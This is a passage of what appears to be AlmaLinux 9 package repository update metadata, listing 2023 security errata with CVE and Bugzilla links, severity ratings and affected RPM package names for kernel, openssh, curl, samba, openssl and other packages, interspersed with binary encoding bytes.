update0���Whttps://access.redhat.com/errata/RHSA-2023:2570RHSA-2023:2570RHSA-2023:2570https://access.redhat.com/security/cve/CVE-2020-17049CVE-2020-17049CVE-2020-17049https://bugzilla.redhat.com/20257212025721https://errata.almalinux.org/9/ALSA-2023-2570.htmlALSA-2023:2570ALSA-2023:2570�'�krb5-server-ldap-1.20.1-8.el9.x86_64.rpm�$�krb5-libs-1.20.1-8.el9.x86_64.rpm�$�krb5-libs-1.20.1-8.el9.i686.rpm�&�krb5-server-1.20.1-8.el9.x86_64.rpm�p�krb5-workstation-1.20.1-8.el9.x86_64.rpm�(�libkadm5-1.20.1-8.el9.i686.rpm�%�krb5-pkinit-1.20.1-8.el9.x86_64.rpm�&�krb5-server-1.20.1-8.el9.i686.rpm�(�libkadm5-1.20.1-8.el9.x86_64.rpm�%�krb5-pkinit-1.20.1-8.el9.i686.rpm�'�krb5-server-ldap-1.20.1-8.el9.i686.rpm�'�krb5-server-ldap-1.20.1-8.el9.x86_64.rpm�$�krb5-libs-1.20.1-8.el9.x86_64.rpm�$�krb5-libs-1.20.1-8.el9.i686.rpm�&�krb5-server-1.20.1-8.el9.x86_64.rpm�p�krb5-workstation-1.20.1-8.el9.x86_64.rpm�(�libkadm5-1.20.1-8.el9.i686.rpm�%�krb5-pkinit-1.20.1-8.el9.x86_64.rpm�&�krb5-server-1.20.1-8.el9.i686.rpm�(�libkadm5-1.20.1-8.el9.x86_64.rpm�%�krb5-pkinit-1.20.1-8.el9.i686.rpm�'�krb5-server-ldap-1.20.1-8.el9.i686.rpm����-�s��NBsecurityLow: lua security update0�9��p�Rhttps://access.redhat.com/errata/RHSA-2023:2582RHSA-2023:2582RHSA-2023:2582https://access.redhat.com/security/cve/CVE-2022-28805CVE-2022-28805CVE-2022-28805https://bugzilla.redhat.com/20738842073884https://errata.almalinux.org/9/ALSA-2023-2582.htmlALSA-2023:2582ALSA-2023:2582��"lua-libs-5.4.4-3.el9.x86_64.rpm��"lua-libs-5.4.4-3.el9.i686.rpm��"lua-libs-5.4.4-3.el9.x86_64.rpm��"lua-libs-5.4.4-3.el9.i686.rpm����n�t��QBBBBBBsecurityModerate: openssh security update0��B�https://access.redhat.com/errata/RHSA-2023:2645RHSA-2023:2645RHSA-2023:2645https://access.redhat.com/security/cve/CVE-2023-25136CVE-2023-25136CVE-2023-25136https://bugzilla.redhat.com/21676362167636https://errata.almalinux.org/9/ALSA-2023-2645.htmlALSA-2023:2645ALSA-2023:2645�s�vopenssh-keycat-8.7p1-29.el9_2.x86_64.rpm�q�vopenssh-8.7p1-29.el9_2.x86_64.rpm�r�vopenssh-clients-8.7p1-29.el9_2.x86_64.rpm�t�vopenssh-server-8.7p1-29.el9_2.x86_64.rpm�s�vopenssh-keycat-8.7p1-29.el9_2.x86_64.rpm�q�vopenssh-8.7p1-29.el9_2.x86_64.rpm�r�vopenssh-clients-8.7p1-29.el9_2.x86_64.rpm�t�vopenssh-server-8.7p1-29.el9_2.x86_64.rpm����I�u��YBBBBBBBBsecurityModerate: curl security update0��J�(https://access.redhat.com/errata/RHSA-2023:2650RHSA-2023:2650RHSA-2023:2650https://access.redhat.com/security/cve/CVE-2023-27535CVE-2023-27535CVE-2023-27535https://bugzilla.redhat.com/21790732179073https://errata.almalinux.org/9/ALSA-2023-2650.htmlALSA-2023:2650ALSA-2023:2650�)�Gcurl-7.76.1-23.el9_2.1.x86_64.rpm{�Glibcurl-7.76.1-23.el9_2.1.x86_64.rpm�*�Gcurl-minimal-7.76.1-23.el9_2.1.x86_64.rpm|�Glibcurl-minimal-7.76.1-23.el9_2.1.x86_64.rpm{�Glibcurl-7.76.1-23.el9_2.1.i686.rpm|�Glibcurl-minimal-7.76.1-23.el9_2.1.i686.rpm�)�Gcurl-7.76.1-23.el9_2.1.x86_64.rpm{�Glibcurl-7.76.1-23.el9_2.1.x86_64.rpm�*�Gcurl-minimal-7.76.1-23.el9_2.1.x86_64.rpm|�Glibcurl-minimal-7.76.1-23.el9_2.1.x86_64.rpm{�Glibcurl-7.76.1-23.el9_2.1.i686.rpm|�Glibcurl-minimal-7.76.1-23.el9_2.1.i686.rpm����C�v��cBsecurityImportant: c-ares security update0'��r�https://access.redhat.com/errata/RHSA-2023:3559RHSA-2023:3559RHSA-2023:3559https://access.redhat.com/security/cve/CVE-2023-32067CVE-2023-32067CVE-2023-32067https://bugzilla.redhat.com/22095022209502https://errata.almalinux.org/9/ALSA-2023-3559.htmlALSA-2023:3559ALSA-2023:3559��Zc-ares-1.17.1-5.el9_2.1.x86_64.rpm��Zc-ares-1.17.1-5.el9_2.1.i686.rpm��Zc-ares-1.17.1-5.el9_2.1.x86_64.rpm��Zc-ares-1.17.1-5.el9_2.1.i686.rpm����|�w��fBBBsecurityImportant: python3.9 security update0'��q�+https://access.redhat.com/errata/RHSA-2023:3595RHSA-2023:3595RHSA-2023:3595https://access.redhat.com/security/cve/CVE-2023-24329CVE-2023-24329CVE-2023-24329https://bugzilla.redhat.com/21739172173917https://errata.almalinux.org/9/ALSA-2023-3595.htmlALSA-2023:3595ALSA-2023:3595-�python3-libs-3.9.16-1.el9_2.1.x86_64.rpm-�python3-libs-3.9.16-1.el9_2.1.i686.rpm��python3-3.9.16-1.el9_2.1.x86_64.rpm-�python3-libs-3.9.16-1.el9_2.1.x86_64.rpm-�python3-libs-3.9.16-1.el9_2.1.i686.rpm��python3-3.9.16-1.el9_2.1.x86_64.rpm����u�x��kBBBsecurityModerate: openssl security and bug fix update0���Vhttps://access.redhat.com/errata/RHSA-2023:3722RHSA-2023:3722RHSA-2023:3722https://access.redhat.com/security/cve/CVE-2023-0464CVE-2023-0464CVE-2023-0464https://access.redhat.com/security/cve/CVE-2023-0465CVE-2023-0465CVE-2023-0465https://access.redhat.com/security/cve/CVE-2023-0466CVE-2023-0466CVE-2023-0466https://access.redhat.com/security/cve/CVE-2023-1255CVE-2023-1255CVE-2023-1255https://access.redhat.com/security/cve/CVE-2023-2650CVE-2023-2650CVE-2023-2650https://bugzilla.redhat.com/21810822181082https://bugzilla.redhat.com/21825612182561https://bugzilla.redhat.com/21825652182565https://bugzilla.redhat.com/21884612188461https://bugzilla.redhat.com/22079472207947https://errata.almalinux.org/9/ALSA-2023-3722.htmlALSA-2023:3722ALSA-2023:3722��uopenssl-libs-3.0.7-16.el9_2.i686.rpm��uopenssl-libs-3.0.7-16.el9_2.x86_64.rpm�:�uopenssl-3.0.7-16.el9_2.x86_64.rpm��uopenssl-libs-3.0.7-16.el9_2.i686.rpm��uopenssl-libs-3.0.7-16.el9_2.x86_64.rpm�:�uopenssl-3.0.7-16.el9_2.x86_64.rpm����z�y��pBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security and bug fix update0'��r�https://access.redhat.com/errata/RHSA-2023:3723RHSA-2023:3723RHSA-2023:3723https://access.redhat.com/security/cve/CVE-2023-2002CVE-2023-2002CVE-2023-2002https://access.redhat.com/security/cve/CVE-2023-2124CVE-2023-2124CVE-2023-2124https://access.redhat.com/security/cve/CVE-2023-2194CVE-2023-2194CVE-2023-2194https://access.redhat.com/security/cve/CVE-2023-2235CVE-2023-2235CVE-2023-2235https://access.redhat.com/security/cve/CVE-2023-28466CVE-2023-28466CVE-2023-28466https://access.redhat.com/security/cve/CVE-2023-32233CVE-2023-32233CVE-2023-32233https://bugzilla.redhat.com/21790002179000https://bugzilla.redhat.com/21873082187308https://bugzilla.redhat.com/21874392187439https://bugzilla.redhat.com/21883962188396https://bugzilla.redhat.com/21925892192589https://bugzilla.redhat.com/21961052196105https://errata.almalinux.org/9/ALSA-2023-3723.htmlALSA-2023:3723ALSA-2023:3723@kernel-modules-extra-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-core-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-debug-modules-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-debug-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-modules-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-tools-5.14.0-284.18.1.el9_2.x86_64.rpm!@kernel-modules-core-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-debug-modules-core-5.14.0-284.18.1.el9_2.x86_64.rpm2@python3-perf-5.14.0-284.18.1.el9_2.x86_64.rpm @kernel-debug-uki-virt-5.14.0-284.18.1.el9_2.x86_64.rpm1�:bpftool-7.0.0-284.18.1.el9_2.x86_64.rpm@kernel-debug-modules-extra-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-debug-core-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-abi-stablelists-5.14.0-284.18.1.el9_2.noarch.rpm@kernel-tools-libs-5.14.0-284.18.1.el9_2.x86_64.rpm"@kernel-uki-virt-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-modules-extra-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-core-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-debug-modules-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-debug-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-modules-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-tools-5.14.0-284.18.1.el9_2.x86_64.rpm!@kernel-modules-core-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-debug-modules-core-5.14.0-284.18.1.el9_2.x86_64.rpm2@python3-perf-5.14.0-284.18.1.el9_2.x86_64.rpm @kernel-debug-uki-virt-5.14.0-284.18.1.el9_2.x86_64.rpm1�:bpftool-7.0.0-284.18.1.el9_2.x86_64.rpm@kernel-debug-modules-extra-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-debug-core-5.14.0-284.18.1.el9_2.x86_64.rpm@kernel-abi-stablelists-5.14.0-284.18.1.el9_2.noarch.rpm@kernel-tools-libs-5.14.0-284.18.1.el9_2.x86_64.rpm"@kernel-uki-virt-5.14.0-284.18.1.el9_2.x86_64.rpm����_�z��QsecurityModerate: less security update0���Chttps://access.redhat.com/errata/RHSA-2023:3725RHSA-2023:3725RHSA-2023:3725https://access.redhat.com/security/cve/CVE-2022-46663CVE-2022-46663CVE-2022-46663https://bugzilla.redhat.com/21696212169621https://errata.almalinux.org/9/ALSA-2023-3725.htmlALSA-2023:3725ALSA-2023:3725�R�6less-590-2.el9_2.x86_64.rpm�R�6less-590-2.el9_2.x86_64.rpm����/�{��TBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: samba security and bug fix update0��C�https://access.redhat.com/errata/RHSA-2023:4325RHSA-2023:4325RHSA-2023:4325https://access.redhat.com/security/cve/CVE-2023-3347CVE-2023-3347CVE-2023-3347https://bugzilla.redhat.com/22227922222792https://errata.almalinux.org/9/ALSA-2023-4325.htmlALSA-2023:4325ALSA-2023:4325�<)python3-samba-dc-4.17.5-103.el9_2.alma.x86_64.rpm�Y)samba-common-tools-4.17.5-103.el9_2.alma.x86_64.rpm�Y)libnetapi-4.17.5-103.el9_2.alma.i686.rpm�[)samba-dc-libs-4.17.5-103.el9_2.alma.i686.rpm�6)samba-winbind-modules-4.17.5-103.el9_2.alma.x86_64.rpm�>)samba-dcerpc-4.17.5-103.el9_2.alma.x86_64.rpm�?)samba-ldb-ldap-modules-4.17.5-103.el9_2.alma.x86_64.rpm�3)samba-client-libs-4.17.5-103.el9_2.alma.x86_64.rpm�0)libsmbclient-4.17.5-103.el9_2.alma.i686.rpm�1)libwbclient-4.17.5-103.el9_2.alma.x86_64.rpm�Y)libnetapi-4.17.5-103.el9_2.alma.x86_64.rpm�3)samba-client-libs-4.17.5-103.el9_2.alma.i686.rpm�X)samba-4.17.5-103.el9_2.alma.x86_64.rpm�2)python3-samba-4.17.5-103.el9_2.alma.x86_64.rpm�@)samba-tools-4.17.5-103.el9_2.alma.x86_64.rpm�4)samba-common-libs-4.17.5-103.el9_2.alma.i686.rpm�A)samba-usershares-4.17.5-103.el9_2.alma.x86_64.rpm�5)samba-libs-4.17.5-103.el9_2.alma.i686.rpm�0)libsmbclient-4.17.5-103.el9_2.alma.x86_64.rpm�5)samba-libs-4.17.5-103.el9_2.alma.x86_64.rpm�1)libwbclient-4.17.5-103.el9_2.alma.i686.rpm�Z)samba-winbind-4.17.5-103.el9_2.alma.x86_64.rpm�u)samba-common-4.17.5-103.el9_2.alma.noarch.rpm�6)samba-winbind-modules-4.17.5-103.el9_2.alma.i686.rpm�2)python3-samba-4.17.5-103.el9_2.alma.i686.rpm�[)samba-dc-libs-4.17.5-103.el9_2.alma.x86_64.rpm�4)samba-common-libs-4.17.5-103.el9_2.alma.x86_64.rpm�<)python3-samba-dc-4.17.5-103.el9_2.alma.x86_64.rpm�Y)samba-common-tools-4.17.5-103.el9_2.alma.x86_64.rpm�Y)libnetapi-4.17.5-103.el9_2.alma.i686.rpm�[)samba-dc-libs-4.17.5-103.el9_2.alma.i686.rpm�6)samba-winbind-modules-4.17.5-103.el9_2.alma.x86_64.rpm�>)samba-dcerpc-4.17.5-103.el9_2.alma.x86_64.rpm�?)samba-ldb-ldap-modules-4.17.5-103.el9_2.alma.x86_64.rpm�3)samba-client-libs-4.17.5-103.el9_2.alma.x86_64.rpm�0)libsmbclient-4.17.5-103.el9_2.alma.i686.rpm�1)libwbclient-4.17.5-103.el9_2.alma.x86_64.rpm�Y)libnetapi-4.17.5-103.el9_2.alma.x86_64.rpm�3)samba-client-libs-4.17.5-103.el9_2.alma.i686.rpm�X)samba-4.17.5-103.el9_2.alma.x86_64.rpm�2)python3-samba-4.17.5-103.el9_2.alma.x86_64.rpm�@)samba-tools-4.17.5-103.el9_2.alma.x86_64.rpm�4)samba-common-libs-4.17.5-103.el9_2.alma.i686.rpm�A)samba-usershares-4.17.5-103.el9_2.alma.x86_64.rpm�5)samba-libs-4.17.5-103.el9_2.alma.i686.rpm�0)libsmbclient-4.17.5-103.el9_2.alma.x86_64.rpm�5)samba-libs-4.17.5-103.el9_2.alma.x86_64.rpm�1)libwbclient-4.17.5-103.el9_2.alma.i686.rpm�Z)samba-winbind-4.17.5-103.el9_2.alma.x86_64.rpm�u)samba-common-4.17.5-103.el9_2.alma.noarch.rpm�6)samba-winbind-modules-4.17.5-103.el9_2.alma.i686.rpm�2)python3-samba-4.17.5-103.el9_2.alma.i686.rpm�[)samba-dc-libs-4.17.5-103.el9_2.alma.x86_64.rpm�4)samba-common-libs-4.17.5-103.el9_2.alma.x86_64.rpm����@�|��@BsecurityModerate: libeconf security update0��K�https://access.redhat.com/errata/RHSA-2023:4347RHSA-2023:4347RHSA-2023:4347https://access.redhat.com/security/cve/CVE-2023-22652CVE-2023-22652CVE-2023-22652https://bugzilla.redhat.com/22124632212463https://errata.almalinux.org/9/ALSA-2023-4347.htmlALSA-2023:4347ALSA-2023:4347�0�Wlibeconf-0.4.1-3.el9_2.x86_64.rpm�0�Wlibeconf-0.4.1-3.el9_2.i686.rpm�0�Wlibeconf-0.4.1-3.el9_2.x86_64.rpm�0�Wlibeconf-0.4.1-3.el9_2.i686.rpm����T�}��DBBBsecurityModerate: libxml2 security update0��Y�Nhttps://access.redhat.com/errata/RHSA-2023:4349RHSA-2023:4349RHSA-2023:4349https://access.redhat.com/security/cve/CVE-2023-28484CVE-2023-28484CVE-2023-28484https://access.redhat.com/security/cve/CVE-2023-29469CVE-2023-29469CVE-2023-29469https://bugzilla.redhat.com/21859842185984https://bugzilla.redhat.com/21859942185994https://errata.almalinux.org/9/ALSA-2023-4349.htmlALSA-2023:4349ALSA-2023:4349��libxml2-2.9.13-3.el9_2.1.i686.rpm�O�python3-libxml2-2.9.13-3.el9_2.1.x86_64.rpm��libxml2-2.9.13-3.el9_2.1.x86_64.rpm��libxml2-2.9.13-3.el9_2.1.i686.rpm�O�python3-libxml2-2.9.13-3.el9_2.1.x86_64.rpm��libxml2-2.9.13-3.el9_2.1.x86_64.rpm�����~��	securityModerate: python-requests security update0��'�https://access.redhat.com/errata/RHSA-2023:4350RHSA-2023:4350RHSA-2023:4350https://access.redhat.com/security/cve/CVE-2023-32681CVE-2023-32681CVE-2023-32681https://bugzilla.redhat.com/22094692209469https://errata.almalinux.org/9/ALSA-2023-4350.htmlALSA-2023:4350ALSA-2023:4350�I�python3-requests-2.25.1-7.el9_2.noarch.rpm�I�python3-requests-2.25.1-7.el9_2.noarch.rpm����J���JBBBBBBBBsecurityModerate: curl security update0��.�~https://access.redhat.com/errata/RHSA-2023:4354RHSA-2023:4354RHSA-2023:4354https://access.redhat.com/security/cve/CVE-2023-28321CVE-2023-28321CVE-2023-28321https://access.redhat.com/security/cve/CVE-2023-28322CVE-2023-28322CVE-2023-28322https://bugzilla.redhat.com/21967862196786https://bugzilla.redhat.com/21967932196793https://errata.almalinux.org/9/ALSA-2023-4354.htmlALSA-2023:4354ALSA-2023:4354�)�Hcurl-7.76.1-23.el9_2.2.x86_64.rpm|�Hlibcurl-minimal-7.76.1-23.el9_2.2.i686.rpm|�Hlibcurl-minimal-7.76.1-23.el9_2.2.x86_64.rpm{�Hlibcurl-7.76.1-23.el9_2.2.i686.rpm�*�Hcurl-minimal-7.76.1-23.el9_2.2.x86_64.rpm{�Hlibcurl-7.76.1-23.el9_2.2.x86_64.rpm�)�Hcurl-7.76.1-23.el9_2.2.x86_64.rpm|�Hlibcurl-minimal-7.76.1-23.el9_2.2.i686.rpm|�Hlibcurl-minimal-7.76.1-23.el9_2.2.x86_64.rpm{�Hlibcurl-7.76.1-23.el9_2.2.i686.rpm�*�Hcurl-minimal-7.76.1-23.el9_2.2.x86_64.rpm{�Hlibcurl-7.76.1-23.el9_2.2.x86_64.rpm����j���TBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security, bug fix, and enhancement update0'��,�0https://access.redhat.com/errata/RHSA-2023:4377RHSA-2023:4377RHSA-2023:4377https://access.redhat.com/security/cve/CVE-2022-45869CVE-2022-45869CVE-2022-45869https://access.redhat.com/security/cve/CVE-2023-0458CVE-2023-0458CVE-2023-0458https://access.redhat.com/security/cve/CVE-2023-1998CVE-2023-1998CVE-2023-1998https://access.redhat.com/security/cve/CVE-2023-3090CVE-2023-3090CVE-2023-3090https://access.redhat.com/security/cve/CVE-2023-35788CVE-2023-35788CVE-2023-35788https://bugzilla.redhat.com/21513172151317https://bugzilla.redhat.com/21872572187257https://bugzilla.redhat.com/21932192193219https://bugzilla.redhat.com/22157682215768https://bugzilla.redhat.com/22186722218672https://errata.almalinux.org/9/ALSA-2023-4377.htmlALSA-2023:4377ALSA-2023:43772Apython3-perf-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-debug-modules-extra-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-modules-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-debug-modules-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-debug-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-tools-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-modules-extra-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-debug-modules-core-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-debug-core-5.14.0-284.25.1.el9_2.x86_64.rpm Akernel-debug-uki-virt-5.14.0-284.25.1.el9_2.x86_64.rpm!Akernel-modules-core-5.14.0-284.25.1.el9_2.x86_64.rpm1�;bpftool-7.0.0-284.25.1.el9_2.x86_64.rpmAkernel-tools-libs-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-core-5.14.0-284.25.1.el9_2.x86_64.rpm"Akernel-uki-virt-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-abi-stablelists-5.14.0-284.25.1.el9_2.noarch.rpm2Apython3-perf-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-debug-modules-extra-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-modules-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-debug-modules-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-debug-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-tools-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-modules-extra-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-debug-modules-core-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-debug-core-5.14.0-284.25.1.el9_2.x86_64.rpm Akernel-debug-uki-virt-5.14.0-284.25.1.el9_2.x86_64.rpm!Akernel-modules-core-5.14.0-284.25.1.el9_2.x86_64.rpm1�;bpftool-7.0.0-284.25.1.el9_2.x86_64.rpmAkernel-tools-libs-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-core-5.14.0-284.25.1.el9_2.x86_64.rpm"Akernel-uki-virt-5.14.0-284.25.1.el9_2.x86_64.rpmAkernel-abi-stablelists-5.14.0-284.25.1.el9_2.noarch.rpm���:���uBBBBBBsecurityImportant: openssh security update0'��\�]https://access.redhat.com/errata/RHSA-2023:4412RHSA-2023:4412RHSA-2023:4412https://access.redhat.com/security/cve/CVE-2023-38408CVE-2023-38408CVE-2023-38408https://bugzilla.redhat.com/22241732224173https://errata.almalinux.org/9/ALSA-2023-4412.htmlALSA-2023:4412ALSA-2023:4412�s�wopenssh-keycat-8.7p1-30.el9_2.x86_64.rpm�q�wopenssh-8.7p1-30.el9_2.x86_64.rpm�r�wopenssh-clients-8.7p1-30.el9_2.x86_64.rpm�t�wopenssh-server-8.7p1-30.el9_2.x86_64.rpm�s�wopenssh-keycat-8.7p1-30.el9_2.x86_64.rpm�q�wopenssh-8.7p1-30.el9_2.x86_64.rpm�r�wopenssh-clients-8.7p1-30.el9_2.x86_64.rpm�t�wopenssh-server-8.7p1-30.el9_2.x86_64.rpm����
���}BBBBBBsecurityModerate: dbus security update0��9�https://access.redhat.com/errata/RHSA-2023:4569RHSA-2023:4569RHSA-2023:4569https://access.redhat.com/security/cve/CVE-2023-34969CVE-2023-34969CVE-2023-34969https://bugzilla.redhat.com/22131662213166https://errata.almalinux.org/9/ALSA-2023-4569.htmlALSA-2023:4569ALSA-2023:4569�`�edbus-tools-1.12.20-7.el9_2.1.x86_64.rpm�'�edbus-libs-1.12.20-7.el9_2.1.x86_64.rpm�_�edbus-common-1.12.20-7.el9_2.1.noarch.rpm�^�edbus-1.12.20-7.el9_2.1.x86_64.rpm�'�edbus-libs-1.12.20-7.el9_2.1.i686.rpm�`�edbus-tools-1.12.20-7.el9_2.1.x86_64.rpm�'�edbus-libs-1.12.20-7.el9_2.1.x86_64.rpm�_�edbus-common-1.12.20-7.el9_2.1.noarch.rpm�^�edbus-1.12.20-7.el9_2.1.x86_64.rpm�'�edbus-libs-1.12.20-7.el9_2.1.i686.rpm�������EBBBBBBBBsecurityImportant: subscription-manager security update0'��8�https://access.redhat.com/errata/RHSA-2023:4708RHSA-2023:4708RHSA-2023:4708https://access.redhat.com/security/cve/CVE-2023-3899CVE-2023-3899CVE-2023-3899https://bugzilla.redhat.com/22254072225407https://errata.almalinux.org/9/ALSA-2023-4708.htmlALSA-2023:4708ALSA-2023:4708�|�Qsubscription-manager-1.29.33.1-2.el9_2.alma.1.x86_64.rpm�d�Qlibdnf-plugin-subscription-manager-1.29.33.1-2.el9_2.alma.1.x86_64.rpm�r�Qpython3-cloud-what-1.29.33.1-2.el9_2.alma.1.x86_64.rpm�}�Qsubscription-manager-plugin-ostree-1.29.33.1-2.el9_2.alma.1.x86_64.rpm�t�Qpython3-subscription-manager-rhsm-1.29.33.1-2.el9_2.alma.1.x86_64.rpm�|�Qsubscription-manager-1.29.33.1-2.el9_2.alma.1.x86_64.rpm�d�Qlibdnf-plugin-subscription-manager-1.29.33.1-2.el9_2.alma.1.x86_64.rpm�r�Qpython3-cloud-what-1.29.33.1-2.el9_2.alma.1.x86_64.rpm�}�Qsubscription-manager-plugin-ostree-1.29.33.1-2.el9_2.alma.1.x86_64.rpm�t�Qpython3-subscription-manager-rhsm-1.29.33.1-2.el9_2.alma.1.x86_64.rpm����e���PBsecurityImportant: cups security update0'��C�https://access.redhat.com/errata/RHSA-2023:4838RHSA-2023:4838RHSA-2023:4838https://access.redhat.com/security/cve/CVE-2023-32360CVE-2023-32360CVE-2023-32360https://bugzilla.redhat.com/22304952230495https://errata.almalinux.org/9/ALSA-2023-4838.htmlALSA-2023:4838ALSA-2023:4838�+�lcups-libs-2.3.3op2-16.el9_2.1.i686.rpm�+�lcups-libs-2.3.3op2-16.el9_2.1.x86_64.rpm�+�lcups-libs-2.3.3op2-16.el9_2.1.i686.rpm�+�lcups-libs-2.3.3op2-16.el9_2.1.x86_64.rpm����E���SsecurityModerate: dmidecode security update0��]�https://access.redhat.com/errata/RHSA-2023:5061RHSA-2023:5061RHSA-2023:5061https://access.redhat.com/security/cve/CVE-2023-30630CVE-2023-30630CVE-2023-30630https://bugzilla.redhat.com/21866692186669https://errata.almalinux.org/9/ALSA-2023-5061.htmlALSA-2023:5061ALSA-2023:5061�Z� dmidecode-3.3-7.el9_2.1.x86_64.rpm�Z� dmidecode-3.3-7.el9_2.1.x86_64.rpm����O��'�VBBBBBBBBBBBBBBBsecurityModerate: linux-firmware security update0��e�|https://access.redhat.com/errata/RHSA-2023:5068RHSA-2023:5068RHSA-2023:5068https://access.redhat.com/security/cve/CVE-2023-20593CVE-2023-20593CVE-2023-20593https://bugzilla.redhat.com/22178452217845https://errata.almalinux.org/9/ALSA-2023-5068.htmlALSA-2023:5068ALSA-2023:5068�e�Kiwl3160-firmware-25.30.13.0-135.el9_2.alma.1.noarch.rpm�i�`iwl6000g2b-firmware-18.168.6.1-135.el9_2.alma.1.noarch.rpm�f�!iwl5000-firmware-8.83.5.1_1-135.el9_2.alma.1.noarch.rpm�g�iwl5150-firmware-8.24.2.2-135.el9_2.alma.1.noarch.rpm�c�`iwl2000-firmware-18.168.6.1-135.el9_2.alma.1.noarch.rpm�o�[netronome-firmware-20230310-135.el9_2.alma.1.noarch.rpm�h�`iwl6000g2a-firmware-18.168.6.1-135.el9_2.alma.1.noarch.rpm�a�`iwl105-firmware-18.168.6.1-135.el9_2.alma.1.noarch.rpm�b�`iwl135-firmware-18.168.6.1-135.el9_2.alma.1.noarch.rpm�_�iwl100-firmware-39.31.5.1-135.el9_2.alma.1.noarch.rpm�d�`iwl2030-firmware-18.168.6.1-135.el9_2.alma.1.noarch.rpm�n�[linux-firmware-whence-20230310-135.el9_2.alma.1.noarch.rpm�k�Kiwl7260-firmware-25.30.13.0-135.el9_2.alma.1.noarch.rpm�`�	iwl1000-firmware-39.31.5.1-135.el9_2.alma.1.noarch.rpm�l�[libertas-sd8787-firmware-20230310-135.el9_2.alma.1.noarch.rpm�m�[linux-firmware-20230310-135.el9_2.alma.1.noarch.rpm�j�iwl6050-firmware-41.28.5.1-135.el9_2.alma.1.noarch.rpm�e�Kiwl3160-firmware-25.30.13.0-135.el9_2.alma.1.noarch.rpm�i�`iwl6000g2b-firmware-18.168.6.1-135.el9_2.alma.1.noarch.rpm�f�!iwl5000-firmware-8.83.5.1_1-135.el9_2.alma.1.noarch.rpm�g�iwl5150-firmware-8.24.2.2-135.el9_2.alma.1.noarch.rpm�c�`iwl2000-firmware-18.168.6.1-135.el9_2.alma.1.noarch.rpm�o�[netronome-firmware-20230310-135.el9_2.alma.1.noarch.rpm�h�`iwl6000g2a-firmware-18.168.6.1-135.el9_2.alma.1.noarch.rpm�a�`iwl105-firmware-18.168.6.1-135.el9_2.alma.1.noarch.rpm�b�`iwl135-firmware-18.168.6.1-135.el9_2.alma.1.noarch.rpm�_�iwl100-firmware-39.31.5.1-135.el9_2.alma.1.noarch.rpm�d�`iwl2030-firmware-18.168.6.1-135.el9_2.alma.1.noarch.rpm�n�[linux-firmware-whence-20230310-135.el9_2.alma.1.noarch.rpm�k�Kiwl7260-firmware-25.30.13.0-135.el9_2.alma.1.noarch.rpm�`�	iwl1000-firmware-39.31.5.1-135.el9_2.alma.1.noarch.rpm�l�[libertas-sd8787-firmware-20230310-135.el9_2.alma.1.noarch.rpm�m�[linux-firmware-20230310-135.el9_2.alma.1.noarch.rpm�j�iwl6050-firmware-41.28.5.1-135.el9_2.alma.1.noarch.rpm����S�� �hBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security, bug fix, and enhancement update0'��a�_https://access.redhat.com/errata/RHSA-2023:5069RHSA-2023:5069RHSA-2023:5069https://access.redhat.com/security/cve/CVE-2023-1637CVE-2023-1637CVE-2023-1637https://access.redhat.com/security/cve/CVE-2023-20593CVE-2023-20593CVE-2023-20593https://access.redhat.com/security/cve/CVE-2023-21102CVE-2023-21102CVE-2023-21102https://access.redhat.com/security/cve/CVE-2023-31248CVE-2023-31248CVE-2023-31248https://access.redhat.com/security/cve/CVE-2023-3390CVE-2023-3390CVE-2023-3390https://access.redhat.com/security/cve/CVE-2023-35001CVE-2023-35001CVE-2023-35001https://access.redhat.com/security/cve/CVE-2023-3610CVE-2023-3610CVE-2023-3610https://access.redhat.com/security/cve/CVE-2023-3776CVE-2023-3776CVE-2023-3776https://access.redhat.com/security/cve/CVE-2023-4004CVE-2023-4004CVE-2023-4004https://access.redhat.com/security/cve/CVE-2023-4147CVE-2023-4147CVE-2023-4147https://bugzilla.redhat.com/21818912181891https://bugzilla.redhat.com/22132602213260https://bugzilla.redhat.com/22134552213455https://bugzilla.redhat.com/22178452217845https://bugzilla.redhat.com/22208922220892https://bugzilla.redhat.com/22208932220893https://bugzilla.redhat.com/22250972225097https://bugzilla.redhat.com/22251982225198https://bugzilla.redhat.com/22252392225239https://bugzilla.redhat.com/22252752225275https://errata.almalinux.org/9